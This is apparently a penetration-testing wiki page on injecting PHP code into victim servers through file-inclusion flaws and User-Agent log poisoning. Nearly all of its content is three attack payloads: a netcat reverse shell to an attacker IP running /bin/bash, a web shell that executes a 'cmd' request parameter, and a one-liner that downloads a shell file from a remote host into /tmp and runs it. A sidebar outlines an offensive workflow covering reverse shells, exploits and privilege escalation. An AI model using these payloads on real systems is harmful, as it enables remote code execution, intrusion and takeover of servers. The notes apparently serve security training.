Skip to content

Web injected codes

lethanhtung01011980 edited this page Jun 13, 2020 · 4 revisions

Goals

  • To inject code into victims with LFI and RFI

PHP

Can inject into parameters or User-Agent (log possioning)

  • <?php echo shell_exec("nc -nv attacker-ip 4444 -e /bin/bash");?>
  • <?php echo(exec($GET['cmd')); ?>
  • Download and run <?php system("wget http://10.10.14.14/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally